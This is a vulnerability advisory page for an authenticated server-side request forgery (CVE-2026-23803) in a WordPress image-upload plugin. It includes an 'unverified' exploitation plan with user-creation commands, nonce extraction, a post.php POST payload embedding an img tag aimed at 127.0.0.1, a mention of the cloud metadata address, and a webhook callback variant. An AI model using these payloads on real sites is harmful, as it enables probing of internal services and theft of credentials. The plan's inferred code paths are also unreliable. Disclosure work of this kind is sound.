CVE-2026-23803

Smart Auto Upload Images – Import External Images <= 1.2.2 - Authenticated (Contributor+) Server-Side Request Forgery

mediumServer-Side Request Forgery (SSRF)
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
1.2.3
Patched in
122d
Time to patch

Description

The Smart Auto Upload Images – Import External Images plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.2.2
PublishedJanuary 3, 2026
Last updatedMay 4, 2026

What Changed in the Fix

Changes introduced in v1.2.3

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-23803 (Smart Auto Upload Images SSRF) ## 1. Vulnerability Summary The **Smart Auto Upload Images – Import External Images** plugin (<= 1.2.2) is vulnerable to **Authenticated Server-Side Request Forgery (SSRF)**. The plugin's core functionality is to automatic…

Show full research plan

Exploitation Research Plan: CVE-2026-23803 (Smart Auto Upload Images SSRF)

1. Vulnerability Summary

The Smart Auto Upload Images – Import External Images plugin (<= 1.2.2) is vulnerable to Authenticated Server-Side Request Forgery (SSRF). The plugin's core functionality is to automatically detect external image URLs in post content or specified metadata, download them to the local media library, and replace the original URLs. This process involves the server making outbound HTTP requests. The vulnerability exists because the plugin fails to properly validate or restrict the destination of these requests, allowing a user with at least Contributor permissions to force the server to query internal services or arbitrary external locations.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/post.php (via the standard WordPress post save/update flow) or /wp-admin/admin-ajax.php.
  • Trigger: Saving or updating a post that contains an <img> tag with a remote src attribute.
  • Authentication: Authenticated, Contributor-level access or higher.
  • Payload Location: The post_content parameter in a POST request to post.php.
  • Preconditions: The plugin must be active, and the post type being edited must be one that the plugin is configured to monitor (default includes 'post' and 'page').

3. Code Flow (Inferred from Source/Description)

  1. Hook Registration: The plugin (smart-auto-upload-images.php) initializes SmartAutoUploadImages\Services\ImageProcessor. This class likely hooks into save_post or wp_insert_post_data.
  2. Detection: Upon saving a post, ImageProcessor::process() (inferred) uses a regular expression to find all src attributes of <img> tags in the post_content.
  3. Validation: The plugin checks if the domain is "external" (not matching the current site's domain) and not in the "Excluded Domains" list.
  4. The Sink: For each external URL, the plugin calls SmartAutoUploadImages\Services\ImageDownloader::download() (inferred).
  5. Request Execution: Inside download(), the plugin uses wp_remote_get() or a similar PHP function to fetch the image. Since it does not use wp_safe_remote_get() or perform IP/port blacklisting, an attacker can specify internal IPs (e.g., 127.0.0.1, 169.254.169.254) or internal ports.

4. Nonce Acquisition Strategy

To exploit this as a Contributor, we must simulate the post-saving process, which requires a WordPress post nonce.

  1. Identify Entry Point: Navigate to the "Add New Post" page.
  2. Create Draft: Create a draft post via wp-cli or a simple POST to post-new.php to get a post_ID.
  3. Extract Nonces:
    • Navigate to /wp-admin/post.php?post=[post_ID]&action=edit.
    • Use browser_eval to extract the required nonces:
      • _wpnonce: document.querySelector('#_wpnonce').value
      • _wp_http_referer: document.querySelector('input[name="_wp_http_referer"]').value

5. Exploitation Strategy

We will use the standard post-update mechanism to trigger the SSRF.

Step 1: Data Setup

Create a Contributor user and a target post.

wp user create attacker contributor@example.com --role=contributor --user_pass=password
POST_ID=$(wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID) --post_title="SSRF Test" --field=ID)

Step 2: Login and Nonce Extraction

Use the browser to login as the contributor and grab the nonce from the edit page of $POST_ID.

Step 3: Trigger SSRF via Post Content

Perform an HTTP request to update the post content with an "external image" pointing to an internal resource.

Request Details:

  • URL: http://[target]/wp-admin/post.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Payload:
action=editpost
post_ID=[POST_ID]
_wpnonce=[NONCE]
_wp_http_referer=/wp-admin/post.php?post=[POST_ID]&action=edit
post_title=SSRF Exploit
post_content=<img src="http://127.0.0.1:80/secret-internal-service" />
publish=Save Draft

Step 4: Out-of-Band (OOB) Testing (Alternative)

If the internal target is blind, use a collaborator/webhook URL:

<img src="https://your-webhook.com/ssrftest" />

6. Test Data Setup

  1. Internal Target: Set up a dummy service listening on an internal port (e.g., port 80 or 8080) that logs requests.
  2. Plugin Config: Ensure the plugin is active and "Posts" are enabled in Settings -> Auto Upload Images.

7. Expected Results

  • Success: The WordPress server makes an outbound HTTP request to the URL specified in the src attribute.
  • Evidence:
    • Access logs of the internal service/webhook will show a request originating from the WordPress server's IP.
    • The User-Agent will likely be WordPress/[version]; [site_url].
    • The plugin may attempt to "process" the response as an image. If the target is not an image, it might log an error in wp-content/debug.log if WP_DEBUG is on.

8. Verification Steps

After the HTTP request, verify if the plugin attempted to download the "image":

  1. Check the Media Library: wp media list
  2. Check for newly created attachments associated with $POST_ID.
  3. Check the post content to see if the URL was replaced:
    wp post get [POST_ID] --field=post_content
    If the SSRF was successful and the plugin thought it downloaded a file, the URL http://127.0.0.1/... will be replaced by a local /wp-content/uploads/... URL.

9. Alternative Approaches

"Featured Image from URL" Vector

The README mentions a "Set from URL" field for featured images.

  1. Inspect the "Edit Post" page for a field named smart_aui_external_featured_image or similar.
  2. If found, submit the internal URL via this field during the post.php update.

Settings Preview Vector (Contributor+ check needed)

Check if the /smart-aui/v1/preview-pattern REST endpoint accepts a URL for testing patterns.

  • Endpoint: /wp-json/smart-aui/v1/preview-pattern
  • Method: POST
  • Data: { "pattern": "%filename%", "url": "http://127.0.0.1/test" } (Verify parameter names in admin-settings.js).

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.